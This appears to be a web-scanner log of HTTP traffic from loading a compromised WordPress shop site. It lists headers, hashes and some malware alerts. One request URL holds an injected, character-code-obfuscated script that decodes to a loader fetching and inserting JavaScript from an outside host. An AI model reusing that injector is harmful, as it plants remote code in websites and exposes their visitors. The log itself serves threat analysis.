Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Sat, 03 Dec 2022 15:04:30 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
uniqlonhat.com/wp-includes/js/wp-embed.min.js?ver=5.6.10
103.28.36.212200 OK 778 B URL HTTP/1.1 uniqlonhat.com/wp-includes/js/wp-embed.min.js?ver=5.6.10
IP 103.28.36.212:0
ASN #131353 NhanHoa Software company
File type ASCII text, with very long lines (1391)
Hash e995a30abe78bba23e746c6127a85cd9
d0334e2a9af98f09651d1c61dfdfb374d61d5673
bcaafc43b590a61a4c1461a3426659b7dcc64a82d058f97dfa52de7d57a53a67
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/js/wp-embed.min.js?ver=5.6.10 HTTP/1.1
Host: uniqlonhat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/ao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933/
Cookie: dwqa_anonymous=TcXdAdRNPlj1Pet9p95XeuZLtnyoVe59kMQiltbmRFu
HTTP/1.1 200 OK
Connection: Keep-Alive
Cache-Control: public, max-age=604800
Expires: Sat, 10 Dec 2022 15:04:27 GMT
Content-Type: application/javascript
Last-Modified: Thu, 04 Feb 2021 06:17:01 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 778
Date: Sat, 03 Dec 2022 15:04:27 GMT
Server: LiteSpeed
uniqlonhat.com/wp-includes/js/wp-emoji-release.min.js?ver=5.6.10
103.28.36.212200 OK 5.2 kB URL HTTP/1.1 uniqlonhat.com/wp-includes/js/wp-emoji-release.min.js?ver=5.6.10
IP 103.28.36.212:0
ASN #131353 NhanHoa Software company
File type ASCII text, with very long lines (11272)
Hash 1767f95ff18ae27823543221948e8825
8adf72aa1d3f15558f31acb636f63195fe0a00fa
d111821350c83a93bf300c6834bece296c9f4dd5dbc378a3e69ad0406f910552
GET /wp-includes/js/wp-emoji-release.min.js?ver=5.6.10 HTTP/1.1
Host: uniqlonhat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/ao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933/
Cookie: dwqa_anonymous=TcXdAdRNPlj1Pet9p95XeuZLtnyoVe59kMQiltbmRFu
HTTP/1.1 200 OK
Connection: Keep-Alive
Cache-Control: public, max-age=604800
Expires: Sat, 10 Dec 2022 15:04:28 GMT
Content-Type: application/javascript
Last-Modified: Thu, 04 Feb 2021 06:16:59 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 5213
Date: Sat, 03 Dec 2022 15:04:28 GMT
Server: LiteSpeed
static.zotabox.com/%3C///%3C/script%3E%3Cscript%3Eeval(String.fromCharCode(118,%2097,%20114,%2032,%20100,%2061,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2059,%20118,%2097,%20114,%2032,%20115,%2061,%20100,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2039,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2041,%2059,%2032,%2010,%20115,%2046,%20116,%20121,%20112,%20101,%2061,%2039,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2059,%2010,%20115,%2046,%2097,%20115,%20121,%20110,%2099,%2061,%20116,%20114,%20117,%20101,%2059,%2010,%20118,%2097,%20114,%2032,%20112,%20108,%2032,%2061,%2032,%2083,%20116,%20114,%20105,%20110,%20103,%2046,%20102,%20114,%20111,%20109,%2067,%20104,%2097,%20114,%2067,%20111,%20100,%20101,%2040,%2049,%2048,%2052,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2050,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2053,%2056,%2044,%2032,%2052,%2055,%2044,%2032,%2052,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2049,%2049,%2048,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2056,%2044,%2032,%2049,%2048,%2056,%2044,%2032,%2057,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2055,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2057,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2049,%2048,%2057,%2041,%2059,%2010,%20115,%2046,%20115,%20114,%2099,%2061,%20112,%20108,%2043,%2039,%2047,%20102,%2097,%20118,%20111,%20114,%20105,%20116,%20101,%2046,%20106,%20115,%2063,%20116,%2061,%20116,%2038,%2039,%2059,%2032,%2010,%20105,%20102,%2032,%2040,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2032,%20123,%2032,%2010,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2046,%20112,%2097,%20114,%20101,%20110,%20116,%2078,%20111,%20100,%20101,%2046,%20105,%20110,%20115,%20101,%20114,%20116,%2066,%20101,%20102,%20111,%20114,%20101,%2040,%20115,%2044,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2059,%2010,%20125,%2032,%20101,%20108,%20115,%20101,%2032,%20123,%2010,%20100,%2046,%20103,%20101,%20116,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%20115,%2066,%20121,%2084,%2097,%20103,%2078,%2097,%20109,%20101,%2040,%2039,%20104,%20101,%2097,%20100,%2039,%2041,%2091,%2048,%2093,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20115,%2041,%2059,%2010,%20125));%3C/script%3E/widgets.js
104.22.54.216404 Not Found 764 B URL HTTP/1.1 static.zotabox.com/%3C///%3C/script%3E%3Cscript%3Eeval(String.fromCharCode(118,%2097,%20114,%2032,%20100,%2061,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2059,%20118,%2097,%20114,%2032,%20115,%2061,%20100,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2039,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2041,%2059,%2032,%2010,%20115,%2046,%20116,%20121,%20112,%20101,%2061,%2039,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2059,%2010,%20115,%2046,%2097,%20115,%20121,%20110,%2099,%2061,%20116,%20114,%20117,%20101,%2059,%2010,%20118,%2097,%20114,%2032,%20112,%20108,%2032,%2061,%2032,%2083,%20116,%20114,%20105,%20110,%20103,%2046,%20102,%20114,%20111,%20109,%2067,%20104,%2097,%20114,%2067,%20111,%20100,%20101,%2040,%2049,%2048,%2052,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2050,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2053,%2056,%2044,%2032,%2052,%2055,%2044,%2032,%2052,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2049,%2049,%2048,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2056,%2044,%2032,%2049,%2048,%2056,%2044,%2032,%2057,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2055,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2057,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2049,%2048,%2057,%2041,%2059,%2010,%20115,%2046,%20115,%20114,%2099,%2061,%20112,%20108,%2043,%2039,%2047,%20102,%2097,%20118,%20111,%20114,%20105,%20116,%20101,%2046,%20106,%20115,%2063,%20116,%2061,%20116,%2038,%2039,%2059,%2032,%2010,%20105,%20102,%2032,%2040,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2032,%20123,%2032,%2010,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2046,%20112,%2097,%20114,%20101,%20110,%20116,%2078,%20111,%20100,%20101,%2046,%20105,%20110,%20115,%20101,%20114,%20116,%2066,%20101,%20102,%20111,%20114,%20101,%2040,%20115,%2044,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2059,%2010,%20125,%2032,%20101,%20108,%20115,%20101,%2032,%20123,%2010,%20100,%2046,%20103,%20101,%20116,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%20115,%2066,%20121,%2084,%2097,%20103,%2078,%2097,%20109,%20101,%2040,%2039,%20104,%20101,%2097,%20100,%2039,%2041,%2091,%2048,%2093,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20115,%2041,%2059,%2010,%20125));%3C/script%3E/widgets.js
IP 104.22.54.216:0
File type HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (2986)
Hash e0b278a03f3c0916a366ea6e39a232c7
c383e5fa69a1cf6016560cb0aa9f17be5b699bea
22d617e43c0296250a3e4b524c3672329157563a5b5f065f4f7d0e8b5ea78e40
GET /%3C///%3C/script%3E%3Cscript%3Eeval(String.fromCharCode(118,%2097,%20114,%2032,%20100,%2061,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2059,%20118,%2097,%20114,%2032,%20115,%2061,%20100,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2039,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2041,%2059,%2032,%2010,%20115,%2046,%20116,%20121,%20112,%20101,%2061,%2039,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2059,%2010,%20115,%2046,%2097,%20115,%20121,%20110,%2099,%2061,%20116,%20114,%20117,%20101,%2059,%2010,%20118,%2097,%20114,%2032,%20112,%20108,%2032,%2061,%2032,%2083,%20116,%20114,%20105,%20110,%20103,%2046,%20102,%20114,%20111,%20109,%2067,%20104,%2097,%20114,%2067,%20111,%20100,%20101,%2040,%2049,%2048,%2052,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2050,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2053,%2056,%2044,%2032,%2052,%2055,%2044,%2032,%2052,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2049,%2049,%2048,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2056,%2044,%2032,%2049,%2048,%2056,%2044,%2032,%2057,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2055,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2057,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2049,%2048,%2057,%2041,%2059,%2010,%20115,%2046,%20115,%20114,%2099,%2061,%20112,%20108,%2043,%2039,%2047,%20102,%2097,%20118,%20111,%20114,%20105,%20116,%20101,%2046,%20106,%20115,%2063,%20116,%2061,%20116,%2038,%2039,%2059,%2032,%2010,%20105,%20102,%2032,%2040,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2032,%20123,%2032,%2010,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2046,%20112,%2097,%20114,%20101,%20110,%20116,%2078,%20111,%20100,%20101,%2046,%20105,%20110,%20115,%20101,%20114,%20116,%2066,%20101,%20102,%20111,%20114,%20101,%2040,%20115,%2044,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2059,%2010,%20125,%2032,%20101,%20108,%20115,%20101,%2032,%20123,%2010,%20100,%2046,%20103,%20101,%20116,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%20115,%2066,%20121,%2084,%2097,%20103,%2078,%2097,%20109,%20101,%2040,%2039,%20104,%20101,%2097,%20100,%2039,%2041,%2091,%2048,%2093,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20115,%2041,%2059,%2010,%20125));%3C/script%3E/widgets.js HTTP/1.1
Host: static.zotabox.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/
HTTP/1.1 404 Not Found
Date: Sat, 03 Dec 2022 15:04:30 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: Zotabox
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,POST
Content-Security-Policy: default-src 'none'
X-Content-Type-Options: nosniff
Content-Encoding: gzip
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 773d31f5edbfb500-OSL
uniqlonhat.com/wp-content/uploads/2016/01/catspp-58640_298x226.jpg
103.28.36.212200 OK 13 kB URL HTTP/1.1 uniqlonhat.com/wp-content/uploads/2016/01/catspp-58640_298x226.jpg
IP 103.28.36.212:0
ASN #131353 NhanHoa Software company
File type JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 298x226, components 3\012- data
Hash 8ec93b6fd0066cb38630520993eec10b
fc184aaa8e77df015b019a17a9564045e07cdeed
4342b9482a1bc35c98f57bcccf92360291a94b155f50ba7c8fc6a912cdcd6768
GET /wp-content/uploads/2016/01/catspp-58640_298x226.jpg HTTP/1.1
Host: uniqlonhat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/ao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933/
Cookie: dwqa_anonymous=TcXdAdRNPlj1Pet9p95XeuZLtnyoVe59kMQiltbmRFu
HTTP/1.1 200 OK
Connection: Keep-Alive
Cache-Control: public, max-age=604800
Expires: Sat, 10 Dec 2022 15:04:28 GMT
Content-Type: image/jpeg
Last-Modified: Sat, 03 Dec 2022 15:04:26 GMT
Accept-Ranges: bytes
Content-Length: 12577
Date: Sat, 03 Dec 2022 15:04:28 GMT
Server: LiteSpeed
uniqlonhat.com/wp-content/uploads/2016/09/190380-1-44x44.jpg
103.28.36.212200 OK 1.7 kB URL HTTP/1.1 uniqlonhat.com/wp-content/uploads/2016/09/190380-1-44x44.jpg
IP 103.28.36.212:0
ASN #131353 NhanHoa Software company
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 44x44, components 3\012- data
Hash 6e367426623e16328616abb9d0befdeb
e3a7a11431757a8614334ab6a37e2bdf02b1e170
cac70adaa8867581b11a153739d6efab3acacf7502333fd17ee5315fe8508dde
GET /wp-content/uploads/2016/09/190380-1-44x44.jpg HTTP/1.1
Host: uniqlonhat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/ao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933/
Cookie: dwqa_anonymous=TcXdAdRNPlj1Pet9p95XeuZLtnyoVe59kMQiltbmRFu
HTTP/1.1 200 OK
Connection: Keep-Alive
Cache-Control: public, max-age=604800
Expires: Sat, 10 Dec 2022 15:04:28 GMT
Content-Type: image/jpeg
Last-Modified: Thu, 26 Mar 2020 04:38:14 GMT
Accept-Ranges: bytes
Content-Length: 1684
Date: Sat, 03 Dec 2022 15:04:28 GMT
Server: LiteSpeed
fonts.gstatic.com/s/patrickhand/v19/LDI1apSQOAYtSuYWp8ZhfYe8UcLLq7s.woff2
216.58.207.227200 OK 11 kB URL HTTP/1.1 fonts.gstatic.com/s/patrickhand/v19/LDI1apSQOAYtSuYWp8ZhfYe8UcLLq7s.woff2
IP 216.58.207.227:0
File type Web Open Font Format (Version 2), TrueType, length 11320, version 1.0\012- data
Hash 346ff68f7607a4d89a9359cbf3c7fb3e
58835868d84b21147d105d0a61613ae783ec6338
75b0f4cb85985683fe4e9de2a1c31cf3160cc93ad1656e5642668f9b01bfcc86
GET /s/patrickhand/v19/LDI1apSQOAYtSuYWp8ZhfYe8UcLLq7s.woff2 HTTP/1.1
Host: fonts.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://uniqlonhat.com
Connection: keep-alive
Referer: http://fonts.googleapis.com/
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: font/woff2
Access-Control-Allow-Origin: *
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="apps-themes"
Report-To: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
Timing-Allow-Origin: *
Content-Length: 11320
Date: Sat, 03 Dec 2022 15:04:30 GMT
Expires: Sun, 03 Dec 2023 15:04:30 GMT
Cache-Control: public, max-age=31536000
Last-Modified: Mon, 09 May 2022 18:39:17 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
uniqlonhat.com/wp-content/themes/eStore/fonts/League_Gothic-webfont.woff
103.28.36.212200 OK 24 kB URL HTTP/1.1 uniqlonhat.com/wp-content/themes/eStore/fonts/League_Gothic-webfont.woff
IP 103.28.36.212:0
ASN #131353 NhanHoa Software company
File type Web Open Font Format, TrueType, length 23940, version 1.0\012- data
Hash be7dd1a6d8462960747cc97d17b9d597
9d3b0eb6cfec9c51959960cebd28b1c3d17b82c5
c2fe70810861a60ea5bed5dca031a28f0a52475bc5e76ff55116f512ed27927c
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/eStore/fonts/League_Gothic-webfont.woff HTTP/1.1
Host: uniqlonhat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Connection: keep-alive
Referer: http://uniqlonhat.com/wp-content/themes/eStore/style.css
Cookie: dwqa_anonymous=TcXdAdRNPlj1Pet9p95XeuZLtnyoVe59kMQiltbmRFu
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Type: font/woff
Last-Modified: Thu, 26 Mar 2020 03:49:43 GMT
Accept-Ranges: bytes
Content-Length: 23940
Date: Sat, 03 Dec 2022 15:04:28 GMT
Server: LiteSpeed
uniqlonhat.com/wp-content/themes/eStore/images/search-icon.png
103.28.36.212200 OK 456 B URL HTTP/1.1 uniqlonhat.com/wp-content/themes/eStore/images/search-icon.png
IP 103.28.36.212:0
ASN #131353 NhanHoa Software company
File type PNG image data, 31 x 29, 8-bit colormap, non-interlaced\012- data
Hash 6f13a2698af9a4037402dcd645f2ebd5
b074deb4a91c93bd8749034be0fa938688119572
34053288ddbb503ceecd2190db36edaffb506cb560cc25940b45c4602f14f1b3
GET /wp-content/themes/eStore/images/search-icon.png HTTP/1.1
Host: uniqlonhat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/ao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933/
Cookie: dwqa_anonymous=TcXdAdRNPlj1Pet9p95XeuZLtnyoVe59kMQiltbmRFu
HTTP/1.1 200 OK
Connection: Keep-Alive
Cache-Control: public, max-age=604800
Expires: Sat, 10 Dec 2022 15:04:28 GMT
Content-Type: image/png
Last-Modified: Thu, 26 Mar 2020 03:49:47 GMT
Accept-Ranges: bytes
Content-Length: 456
Date: Sat, 03 Dec 2022 15:04:28 GMT
Server: LiteSpeed
r3.o.lencr.org/
23.36.76.226200 OK 503 B IP 23.36.76.226:0
ASN #20940 Akamai International B.V.
Hash ecab83d593cc540b02689be5be7abc8a
81cda579b7b9b22332b85266b0126585f3d3f73f
d469c5adb69f261084b016f8e24edf8b69b62d9f930ca2d85cf35375e2303ecc
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "D469C5ADB69F261084B016F8E24EDF8B69B62D9F930CA2D85CF35375E2303ECC"
Last-Modified: Thu, 01 Dec 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5348
Expires: Sat, 03 Dec 2022 16:33:38 GMT
Date: Sat, 03 Dec 2022 15:04:30 GMT
Connection: keep-alive
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F73b53015-e415-4fff-9252-8a16bbe000f5.jpeg
34.120.237.76200 OK 9.7 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F73b53015-e415-4fff-9252-8a16bbe000f5.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 45182367fd4f8b6dd234eef1022acdb1
d4b3052021ff3ad1dc4134fa25eb12a98e7c17da
a57fadaf74db2fb457cfe761314d56f021d22146f5bdb6a8bf11b6519e8a558d
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F73b53015-e415-4fff-9252-8a16bbe000f5.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 9715
x-amzn-requestid: c8102cfa-78dc-4d81-ad6a-e16b9132e238
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ciZO2HQKIAMF8IA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-638a6f2b-350c586b568e6565763376bd;Sampled=0
x-amzn-remapped-date: Fri, 02 Dec 2022 21:33:31 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: 0QkVKyYm9UwlF5FEeli9UsRAQwEi3-c3bMR-QSJxIKRQe7WWT76dGQ==
via: 1.1 030fe0607711293dda988e571617a9f2.cloudfront.net (CloudFront), 1.1 d6b180eb367f7de26d67a9f3901b96a6.cloudfront.net (CloudFront), 1.1 google
date: Fri, 02 Dec 2022 21:51:06 GMT
age: 62004
etag: "d4b3052021ff3ad1dc4134fa25eb12a98e7c17da"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
r3.o.lencr.org/
23.36.76.226200 OK 503 B IP 23.36.76.226:0
ASN #20940 Akamai International B.V.
Hash ecab83d593cc540b02689be5be7abc8a
81cda579b7b9b22332b85266b0126585f3d3f73f
d469c5adb69f261084b016f8e24edf8b69b62d9f930ca2d85cf35375e2303ecc
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "D469C5ADB69F261084B016F8E24EDF8B69B62D9F930CA2D85CF35375E2303ECC"
Last-Modified: Thu, 01 Dec 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5348
Expires: Sat, 03 Dec 2022 16:33:38 GMT
Date: Sat, 03 Dec 2022 15:04:30 GMT
Connection: keep-alive
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F627a3f86-b7fa-44c4-a119-2e3d23eb8b6a.jpeg
34.120.237.76200 OK 5.4 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F627a3f86-b7fa-44c4-a119-2e3d23eb8b6a.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 1e74254b3fdce7d6b84a71a7aff43789
65c8b4abf957f9b54d99d0f78559e639adb29efb
f278c3cc6734da7188862a8c651c803e7ac1fda82234e191761453cb1359d3ee
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F627a3f86-b7fa-44c4-a119-2e3d23eb8b6a.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
server: nginx
content-length: 5354
